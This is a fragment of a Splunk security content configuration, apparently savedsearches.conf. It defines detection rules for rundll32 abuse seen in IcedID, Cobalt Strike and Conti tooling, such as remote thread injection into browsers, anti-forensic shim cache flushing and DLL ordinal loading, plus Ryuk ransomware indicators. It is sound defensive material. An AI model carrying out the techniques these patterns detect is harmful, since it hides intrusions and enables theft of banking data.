suspicious Remote Thread execution of rundll32.exe to any process. This technique was seen in IcedID malware to execute its malicious code in normal process for defense evasion and to steal sensitive information in the compromised host. 
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the SourceImage, TargetImage, and EventCode executions from your endpoints related to create remote thread or injecting codes. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-29 action.escu.modification_date = 2021-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 Create Remote Thread To A Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundl32 process $SourceImage$ create a remote thread to process $TargetImage$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "SourceImage", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 Create Remote Thread To A Process - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies the suspicious Remote Thread execution of rundll32.exe to any process. 
This technique was seen in IcedID malware to execute its malicious code in normal process for defense evasion and to steal sensitive information in the compromised host. action.notable.param.rule_title = Rundll32 Create Remote Thread To A Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=8 SourceImage = "*\\rundll32.exe" TargetImage = "*.exe" | stats count min(_time) as firstTime max(_time) as lastTime by SourceImage TargetImage TargetProcessId SourceProcessId StartAddress EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_create_remote_thread_to_a_process_filter` [ESCU - Rundll32 CreateRemoteThread In Browser - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies the suspicious Remote Thread execution of rundll32.exe process to "firefox.exe" and "chrome.exe" browser. This technique was seen in IcedID malware where it hooks the browser to parse banking information as user used the targetted browser process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies the suspicious Remote Thread execution of rundll32.exe process to "firefox.exe" and "chrome.exe" browser. This technique was seen in IcedID malware where it hooks the browser to parse banking information as user used the targetted browser process. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the SourceImage, TargetImage, and EventCode executions from your endpoints related to create remote thread or injecting codes. 
If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-26 action.escu.modification_date = 2021-07-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 CreateRemoteThread In Browser - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundl32 process $SourceImage$ create a remote thread to browser process $TargetImage$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"threat_object_field": "SourceImage", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 CreateRemoteThread In Browser - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies the suspicious Remote Thread execution of rundll32.exe process to "firefox.exe" and "chrome.exe" browser. This technique was seen in IcedID malware where it hooks the browser to parse banking information as user used the targetted browser process. 
action.notable.param.rule_title = Rundll32 CreateRemoteThread In Browser action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=8 SourceImage = "*\\rundll32.exe" TargetImage IN ("*\\firefox.exe", "*\\chrome.exe", "*\\iexplore.exe","*\\microsoftedgecp.exe") | stats count min(_time) as firstTime max(_time) as lastTime by SourceImage TargetImage TargetProcessId SourceProcessId StartAddress EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_createremotethread_in_browser_filter` [ESCU - Rundll32 DNSQuery - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious rundll32.exe process having a http connection and do a dns query in some web domain. This technique was seen in IcedID malware where the rundll32 that execute its payload will contact amazon.com to check internet connect and to communicate to its C&C server to download config and other file component. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious rundll32.exe process having a http connection and do a dns query in some web domain. This technique was seen in IcedID malware where the rundll32 that execute its payload will contact amazon.com to check internet connect and to communicate to its C&C server to download config and other file component. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and eventcode = 22 dnsquery executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. 
Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-02-18 action.escu.modification_date = 2022-02-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Rundll32 DNSQuery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundll32 process $process_name$ made a DNS query for $query$ from host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Rundll32 DNSQuery - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious rundll32.exe process having a http connection and do a dns query in some web domain. This technique was seen in IcedID malware where the rundll32 that execute its payload will contact amazon.com to check internet connect and to communicate to its C&C server to download config and other file component. 
action.notable.param.rule_title = Rundll32 DNSQuery
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=22 process_name="rundll32.exe" | stats count min(_time) as firstTime max(_time) as lastTime values(query) as query values(answer) as answer values(QueryResults) as query_results values(QueryStatus) as query_status by process_name process_guid Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_dnsquery_filter`

[ESCU - Rundll32 LockWorkStation - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is to detect a suspicious rundll32 commandline to lock the workstation through command line. This technique was seen in CONTI leak tooling and script as part of its defense evasion. This technique is not a common practice to lock a screen and may be a good indicator of compromise.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search is to detect a suspicious rundll32 commandline to lock the workstation through command line. This technique was seen in CONTI leak tooling and script as part of its defense evasion. This technique is not a common practice to lock a screen and may be a good indicator of compromise.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-08-09
action.escu.modification_date = 2021-08-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Rundll32 LockWorkStation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware"]
action.risk = 1
action.risk.param._risk_message = Process $process_name$ with cmdline $process$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Rundll32 LockWorkStation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process= "*user32.dll,LockWorkStation*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_lockworkstation_filter`

[ESCU - Rundll32 Process Creating Exe Dll Files - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is to detect a suspicious rundll32 process that drops executable (.exe or .dll) files. This behavior is seen in the rundll32 process of IcedID, which tries to drop a copy of itself in the temp folder or download an executable and drop it in either appdata or programdata as part of its execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search is to detect a suspicious rundll32 process that drops executable (.exe or .dll) files. This behavior is seen in the rundll32 process of IcedID, which tries to drop a copy of itself in the temp folder or download an executable and drop it in either appdata or programdata as part of its execution.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, TargetFilename, and eventcode 11 executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Rundll32 Process Creating Exe Dll Files - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["IcedID", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = rundll32 process drops a file $file_name$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Rundll32 Process Creating Exe Dll Files - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is to detect a suspicious rundll32 process that drops executable (.exe or .dll) files. This behavior is seen in the rundll32 process of IcedID, which tries to drop a copy of itself in the temp folder or download an executable and drop it in either appdata or programdata as part of its execution.
action.notable.param.rule_title = Rundll32 Process Creating Exe Dll Files
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=11 Image="*rundll32.exe" TargetFilename IN ("*.exe", "*.dll") | stats count min(_time) as firstTime max(_time) as lastTime by Image TargetFilename Computer | rename Computer as dest | rename TargetFilename as file_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_process_creating_exe_dll_files_filter`

[ESCU - Rundll32 Shimcache Flush - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is to detect a suspicious rundll32 commandline to clear the shim cache. This is an anti-forensic technique to clear the cache, which is one of the important artifacts in digital forensics during attacks or incidents. This TTP is a good indicator that someone is trying to evade some tools and clear their foothold on the machine.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic is to detect a suspicious rundll32 commandline to clear the shim cache. This is an anti-forensic technique to clear the cache, which is one of the important artifacts in digital forensics during attacks or incidents. This TTP is a good indicator that someone is trying to evade some tools and clear their foothold on the machine.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-10-05
action.escu.modification_date = 2021-10-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Rundll32 Shimcache Flush - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Unusual Processes", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = rundll32 process execute $process$ to clear shim cache in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Rundll32 Shimcache Flush - Rule
action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic is to detect a suspicious rundll32 commandline to clear the shim cache. This is an anti-forensic technique to clear the cache, which is one of the important artifacts in digital forensics during attacks or incidents. This TTP is a good indicator that someone is trying to evade some tools and clear their foothold on the machine.
action.notable.param.rule_title = Rundll32 Shimcache Flush
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` AND Processes.process = "*apphelp.dll,ShimFlushCache*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll32_shimcache_flush_filter`

[ESCU - Rundll32 with no Command Line Arguments with Network - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies rundll32.exe with no command line arguments and performing a network connection. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint", "Network_Traffic"]
action.escu.eli5 = The following analytic identifies rundll32.exe with no command line arguments and performing a network connection. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of rundll32, triggering a false positive.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Rundll32 with no Command Line Arguments with Network - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "PrintNightmare CVE-2021-34527", "Graceful Wipe Out Attack"]
action.risk = 1
action.risk.param._risk_message = A rundll32 process $process_name$ with no commandline argument like this process commandline $process$ in host $src$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Rundll32 with no Command Line Arguments with Network - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "PrintNightmare CVE-2021-34527", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-34527"], "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies rundll32.exe with no command line arguments and performing a network connection. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.notable.param.rule_title = Rundll32 with no Command Line Arguments with Network
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_rundll32` AND Processes.action!="blocked" by host _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(rundll32\.exe.{0,4}$)" | rename dest as src | join host process_id [| tstats `security_content_summariesonly` count latest(All_Traffic.dest) as dest latest(All_Traffic.dest_ip) as dest_ip latest(All_Traffic.dest_port) as dest_port FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by host All_Traffic.process_id | `drop_dm_object_name(All_Traffic)`] | `rundll32_with_no_command_line_arguments_with_network_filter`

[ESCU - RunDLL Loading DLL By Ordinal - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies rundll32.exe loading an export function by ordinal value. Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly, may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Utilizing ordinal values makes it a bit more complicated for analysts to understand the behavior until the DLL is reviewed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies rundll32.exe loading an export function by ordinal value. Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly, may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Utilizing ordinal values makes it a bit more complicated for analysts to understand the behavior until the DLL is reviewed.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives are possible with native utilities and third party applications. Filtering may be needed based on command-line, or add world-writable paths to restrict the query.
action.escu.creation_date = 2022-02-08
action.escu.modification_date = 2022-02-08
action.escu.confidence = high
action.escu.full_search_name = ESCU - RunDLL Loading DLL By Ordinal - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Unusual Processes", "Suspicious Rundll32 Activity", "Living Off The Land", "IcedID"]
action.risk = 1
action.risk.param._risk_message = A rundll32 process $process_name$ with ordinal parameter like this process commandline $process$ on host $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - RunDLL Loading DLL By Ordinal - Rule
action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Suspicious Rundll32 Activity", "Living Off The Land", "IcedID"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies rundll32.exe loading an export function by ordinal value. Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly, may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Utilizing ordinal values makes it a bit more complicated for analysts to understand the behavior until the DLL is reviewed.
action.notable.param.rule_title = RunDLL Loading DLL By Ordinal
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"rundll32.+\#\d+") | `rundll_loading_dll_by_ordinal_filter`

[ESCU - Ryuk Test Files Detected - Rule]
action.escu = 0
action.escu.enabled = 1
description = The search looks for files that contain the key word *Ryuk* under any folder in the C drive, which is consistent with Ryuk propagation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The search looks for files that contain the key word *Ryuk* under any folder in the C drive, which is consistent with Ryuk propagation.
action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint Filesystem data-model object. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.
action.escu.known_false_positives = If there are files with this keyword as file names, it might trigger false positives; please make use of our filters to tune out potential FPs.
action.escu.creation_date = 2020-11-06
action.escu.modification_date = 2020-11-06
action.escu.confidence = high
action.escu.full_search_name = ESCU - Ryuk Test Files Detected - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ryuk Ransomware"]
action.risk = 1
action.risk.param._risk_message = A creation of ryuk test file $file_path$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 70}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Ryuk Test Files Detected - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search looks for files that contain the key word *Ryuk* under any folder in the C drive, which is consistent with Ryuk propagation.
action.notable.param.rule_title = Ryuk Test Files Detected
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem WHERE "Filesystem.file_path"=C:\\*Ryuk* BY "Filesystem.dest", "Filesystem.user", "Filesystem.file_path" | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ryuk_test_files_detected_filter`

[ESCU - Ryuk Wake on LAN Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = This Splunk query identifies the use of Wake-on-LAN utilized by Ryuk ransomware. The Ryuk Ransomware uses the Wake-on-LAN feature to turn on powered off devices on a compromised network to have greater success encrypting them. This is a high fidelity indicator of Ryuk ransomware executing on an endpoint. Upon triage, isolate the endpoint. Additional file modification events will be within the user's profile (\appdata\roaming) and in public directories (users\public\). Review all Scheduled Tasks on the isolated endpoint and across the fleet. Suspicious Scheduled Tasks will include a path to an unknown binary and those endpoints should be isolated until triaged.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
